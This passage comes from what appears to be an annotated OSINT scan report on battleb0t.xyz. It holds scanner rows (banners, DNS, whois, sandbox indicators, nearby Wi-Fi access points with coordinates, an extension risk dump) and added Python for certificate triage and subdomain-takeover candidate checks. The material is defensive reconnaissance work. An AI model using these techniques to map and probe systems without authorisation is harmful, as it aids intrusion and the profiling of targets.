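    sans = [s.strip()[len("DNS:"):] for s in san_line.split(",") if s.strip().startswith("DNS:")]
    bits = _field(text, r"Public-Key:\s*\((\d+) bit\)")
    return {
        "cn": _field(text, r"^\s*Subject:.*?\bCN\s*=\s*([^,\n]+)"),
        "issuer": _field(text, r"^\s*Issuer:\s*(.+)$"),
        "not_before": _parse_time(_field(text, r"^\s*Not Before:\s*(.+)$")),
        "not_after": _parse_time(_field(text, r"^\s*Not After\s*:\s*(.+)$")),
        "sans": sans,
        "key_bits": int(bits) if bits else None,
        "is_ca": "CA:TRUE" in text,
        "sct_count": text.count("Signed Certificate Timestamp:"),
    }


def triage(cert, now=SCAN_TIME):
    """Evaluate one parsed certificate against the observation time."""
    if now < cert["not_before"]:
        status = "not_yet_valid"
    elif now > cert["not_after"]:
        status = "expired"
    else:
        status = "valid"
    findings = []
    if status != "valid":
        findings.append(f"certificate {status} at scan time")
    if cert["cn"] not in cert["sans"]:
        findings.append("CN not present in SAN")
    if cert["is_ca"]:
        findings.append("end-entity certificate asserts CA:TRUE")
    if cert["key_bits"] is not None and cert["key_bits"] < 2048:
        findings.append(f"RSA key only {cert['key_bits']} bits")
    if cert["sct_count"] < 2:
        findings.append("fewer than two SCTs embedded")
    return {
        "subject": cert["cn"],
        "status": status,
        "days_left": (cert["not_after"] - now).days,
        "lifetime_days": (cert["not_after"] - cert["not_before"]).days,
        "findings": findings,
    }


def triage_all(dumps=SAMPLE_DUMPS, now=SCAN_TIME):
    return [triage(parse_cert_dump(d), now) for d in dumps]


if __name__ == "__main__":
    for r in triage_all():
        print(r)
```

Against the page's own timestamps the fluid.battleb0t.xyz certificate was still valid with 13 days left, while the vscode.battleb0t.xyz certificate had expired two weeks earlier; an expired leaf in CT says nothing about what the host currently serves, so the next step is a live TLS connection with SNI to see whether it was renewed or the name was dropped.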
| 2023-05-12 02:53:42 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8d-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 7C6A:7C80:2850A39:3919A91:645D8DCD
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 1827
X-Served-By: cache-chi-kigq8000031-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683854577.750981,VS0,VE4
Vary: Accept-Encoding
X-Fastly-Request-ID: 01d5273de282686844c6b1cd964008c7007600d9
| 185.199.109.153 |
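The banner row above is a 404 from 185.199.109.153 with Server: GitHub.com, i.e. the GitHub Pages edge behind Fastly. Two things about such a row matter before drawing any conclusion. First, Censys fetches banners by IP, so the Host header used is not any particular battleb0t.xyz name, and a 404 from a shared hosting edge queried by IP is expected; the page does not show the response body. Second, a 404 from a hosting platform for a name that really does CNAME there is the classic starting point for a dangling-record check, but only a re-request with the candidate hostname and a matching body fingerprint turns that into a finding. The following is an added example (not the scanner's logic) that parses the banner, extracts the CSP, and marks the row as a candidate that needs exactly that follow-up. BANNER is a constructed copy of the row with the redacted Date header dropped; PLATFORM_FINGERPRINTS is an assumed table containing only the one Server value seen here.

```python
"""Open-port banner triage for shared-hosting edges (added example)."""
import re

# Constructed copy of the Censys banner row on the page (Date header omitted).
BANNER = """HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8d-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 7C6A:7C80:2850A39:3919A91:645D8DCD
Accept-Ranges: bytes
Via: 1.1 varnish
Age: 1827
X-Served-By: cache-chi-kigq8000031-CHI
X-Cache: HIT
X-Cache-Hits: 1
Vary: Accept-Encoding
"""

# Assumed fingerprint table: Server header value -> hosting platform whose
# 404 can mean "no site bound to the requested name". Only the value seen
# on the page is listed.
PLATFORM_FINGERPRINTS = {
    "github.com": "GitHub Pages",
}


def parse_banner(raw):
    """Split an HTTP banner into (status code, {lowercased header: [values]})."""
    lines = raw.strip().splitlines()
    m = re.match(r"HTTP/\d(?:\.\d)?\s+(\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate wrapped or junk lines in captured banners
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return int(m.group(1)), headers


def parse_csp(value):
    """Turn a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for directive in value.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def triage_banner(raw, requested_host=None):
    """Classify a banner; a takeover candidate is a lead, not a finding."""
    status, headers = parse_banner(raw)
    server = headers.get("server", [""])[0].lower()
    platform = PLATFORM_FINGERPRINTS.get(server)
    csp_raw = headers.get("content-security-policy", [None])[0]
    result = {
        "status": status,
        "server": server,
        "platform": platform,
        "csp": parse_csp(csp_raw) if csp_raw else {},
        "takeover_candidate": False,
        "next_steps": [],
    }
    if platform and status == 404:
        result["takeover_candidate"] = True
        if requested_host is None:
            # Censys-style banners are fetched by IP: the 404 tells us nothing
            # about any specific hostname until we ask for it explicitly.
            result["next_steps"].append(
                "re-request with each hostname that resolves to this IP as Host/SNI")
        result["next_steps"].append(
            "confirm the hostname's CNAME points at %s and compare the 404 body "
            "with the platform's unclaimed-site page" % platform)
    return result


if __name__ == "__main__":
    print(triage_banner(BANNER))
```

The CSP on this 404 (default-src 'none' with only inline styles, data: images and same-origin connects) is the platform's error-page policy, not something the site owner set, so it says nothing about the security posture of any battleb0t.xyz application.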
| 2023-05-12 02:58:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.148.97.127', u'96.6.31.32'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/system/_title_screen.ks', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "CommunicationManager_Mutex"\n "IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bb8_IE_EarlyTabStart_0x87c_Mutex"\n "IsoScope_bb8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bb8_IESQMMUTEX_0_303"\n "SmartScreen_ClientId_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3000"\n "Local\\VERMGMTBlockListFileMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file 
"urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"68.142.107.4:80"\n "34.148.97.127:443"\n "96.6.31.32:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_196E02E2-21A6-11ED-9D74-08002763CA91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003000]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00000276]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n 
"7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003000]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003000]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003000]\n "RecoveryStore._48C636BB-21A4-11ED-9D74-08002763CA91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "76P3A3ZI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\76P3A3ZI.txt]- [targetUID: 00000000-00003000]\n "~DFB1C121D813060596.TMP" has type "data"- Location: [%TEMP%\\~DFB1C121D813060596.TMP]- [targetUID: 00000000-00003000]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00000276]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003000]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00000276]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003000]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00000276]\n "~DF92A4208FF8524FE3.TMP" has type "data"- Location: [%TEMP%\\~DF92A4208FF8524FE3.TMP]- [targetUID: 00000000-00003000]\n "B126BF247C927A243E186240F06A7849" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00000276]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /data/scenario/system/_title_screen.ks HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: 62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.148.97.127]\n\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:b47e5e27-bf85-45ba-a97c-0377ce0e5779\nX-Response-Cache-Status: True\nExpires: Mon, 22 Aug 2022 00:43:49 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Mon, 22 Aug 2022 00:43:49 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': 
u'Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/system/_title_screen.ks"- [Source: Input]\n Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app"- [Source: Input]\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: https://apex-university.netlify.app/ (AV positives: 20/89 scanned on 08/22/2022 00:06:28)\n URL: https://www.toprankedtechgadgetsnow.com/p/tf?affid=8929&provider=Affiliati&click_id=f116ae132e8d4f80a8607bf83fd87f9d&c1=&c2=506642568&c3=&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/22/2022 00:05:22)\n URL: https://grand-kataifi-0d3694.netlify.app/ (AV positives: 11/88 scanned on 08/21/2022 23:01:29)\n URL: https://www.toprankedtechgadgetsnow.com/p/sw?affid=8929&provider=Affiliati&click_id=ad04bd2d55f7442084fd876552cffdde&c1=&c2=506623183&c3=&xyz=30.0 (AV positives: 1/88 scanned on 08/21/2022 22:58:56)\n URL: https://endearing-dusk-d5d9a0.netlify.app/ (AV positives: 11/88 scanned on 08/21/2022 22:07:36)\n File SHA256: ed519561b155ef7b685ef981c466638407317d9d8eb0f5236a3a48f0575f6545 (AV positives: 27/75 scanned on 08/16/2022 18:17:19)\n File SHA256: 524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b (AV positives: 56/75 scanned on 08/12/2022 02:05:05)\n File SHA256: 782eda6bdf7c6cb6067637f06c9a69c3fda5e4d6efbf7a744bc1b7574311d6ca (AV positives: 26/75 scanned on 07/31/2022 23:13:31)\n File SHA256: 53b6bcc44935e6141356b24f7e68b4970457269119a206c0a0b5d731f2e556d4 (AV positives: 6/74 scanned on 
07/31/2022 22:52:37)\n File SHA256: f257c984bab34903c697dcd9eda861735efa9b2e4b9165b40468113acde4695c (AV positives: 24/75 scanned on 07/26/2022 23:14:08)\n Found malicious artifacts related to "96.6.31.32": ...\n\n URL: http://aka.ms/ioavtest (AV positives: 4/88 scanned on 08/12/2022 22:59:26)\n URL: http://96.6.31.32/ (AV positives: 1/87 scanned on 07/14/2022 13:54:58)\n URL: http://aka.ms/ioavtest/ (AV positives: 4/87 scanned on 06/30/2022 23:36:06)\n URL: https://aka.ms/ioavtest (AV positives: 3/93 scanned on 05/29/2022 1 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:6E:18:20) | 50.8897, 6.0563 |
| 2023-05-12 02:45:52 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 37.751, -97.822 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8880 | 172.67.168.252 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.108.153 | www.battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-25T07:00:34Z
Creation Date: 2014-09-27T01:11:37Z
Registrar Registration Expiration Date: 2032-09-27T01:11:37Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Name Server: ns1.cloudflaressl.com
Name Server: ns2.cloudflaressl.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflaressl.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:B4:05) | 37.780462,-122.390564 |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.110 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitecgameuser (Net ID: 00:01:8E:15:D4:A7) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.111.153 | battleb0t.xyz |
| 2023-05-12 02:44:52 | Raw Data from RIRs | No | CRXcavator | 1 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "1.0", "data": {"entrypoints": {"chrome.cookies.get": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [53, 110], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [36, 113], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/redirect.js": [18, 78, 144]}, "chrome.tabs.query": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [253]}, "chrome.runtime.onMessage": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [173]}}, "risk": {"webstore": {"total": 8, "last_updated": 5, "support_site": 1, "rating_users": 1, "users": 1}, "metadata": {}, "total": 460, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 75}}, "extcalls": ["https://fonts.googleapis.com/css?family=Baloo+Bhaina+2|Roboto&display=swap", "https://dayhub.co", "https://gokanto.com/dayhub/getUserProfileData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co?action=signUp", "https://gokanto.com/dayhub/signIn", "https://dayhub.co", "https://dayhub.co/app", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co/app?action=editSchedule", "https://dayhub.co/app?action=editSites", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData"], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "gbkeegbaiigmenfmjfclcdgdpimamgkj": {"rating": 3.6818337, "users": 6000000, "platform": "", "short_description": "View and edit Microsoft Word, Excel, and PowerPoint files with Google Docs, Sheets, 
and Slides", "icon": "https://lh3.googleusercontent.com/nM9DoYWOXecxYlD9b43JTgmjpsSaIAKJ_wHz3fAHysYl_bsVSVVANozLm6dlMVEJ7ZYXx-wydY1IfePdBbjNSQw4=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5824, "name": "Office Editing for Docs, Sheets & Slides"}, "ohahllgiabjaoigichmmfljhkcfikeof": {"rating": 4.8292074, "users": 1000000, "platform": "", "short_description": "Free and improved AdBlocker. Completely remove ALL ads. No \"acceptable\" ads or whitelisted advertisers, block tracking and malware!", "icon": "https://lh3.googleusercontent.com/AsZW_M_1Unw6wZ0r-Th6HP1bSgo3odQg2jvmPN8z01RUGIli-YLnZwGdqpdjUY_pgFaQW4zgeq9vADQ-S8q1Jq6g7Dw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 47584, "name": "AdBlocker Ultimate"}, "lpcaedmchfhocbbapmcbpinfpgnhiddi": {"rating": 4.0977564, "users": 8000000, "platform": "", "short_description": "Save to Google Keep in a single click!", "icon": "https://lh3.googleusercontent.com/PX16LKTye9cVfZTehEpKSUQgntIvmjuvkh4kWF55rTIYMsdmYZiuZFJq-0ONQHueFpToU4HBlvGS8b_hdQhNhH7OfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7621, "name": "Google Keep Chrome Extension"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 
